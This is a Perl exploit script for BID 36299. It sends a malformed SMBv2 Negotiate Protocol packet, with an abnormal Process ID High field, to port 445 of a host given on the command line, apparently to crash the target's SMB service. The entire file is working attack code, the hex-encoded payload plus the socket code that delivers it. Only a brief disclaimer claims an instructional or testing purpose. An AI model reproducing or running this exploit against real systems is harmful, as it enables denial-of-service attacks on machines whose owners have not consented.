#!/usr/bin/perl
# Attack for BID:36299, now in standalone Perl form.
# Discovered by Laurent Gaffie http://g-laurent.blogspot.com, from whom
# the payload is ripped off from.
# Perl version by todb | http://www.planb-security.net/sploits/teardrop_tng.pl
# This code is for instructional/testing purposes ONLY KTHX!

use IO::Socket::INET;

$sploit = "\x00\x00\x00\x90" . # Begin SMB header: Session message
 "\xff\x53\x4d\x42" . # Server Component: SMB
 "\x72\x00\x00\x00" . # Negociate Protocol
 "\x00\x18\x53\xc8" . # Operation 0x18 & sub 0xc853
 "\x00\x26" . # Process ID High: --> :) normal value should be "\x00\x00"
 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" .
 "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" .
 "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" .
 "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" .
 "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" .
 "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" .
 "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" .
 "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" .
 "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" .
 "\x30\x30\x32\x00";

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
	PeerPort => 445,
	Proto => "tcp",
	Type => SOCK_STREAM)
	or die "Can't connect to $ARGV[0], so sad: $!\n";
print $sock $sploit;
close($sock);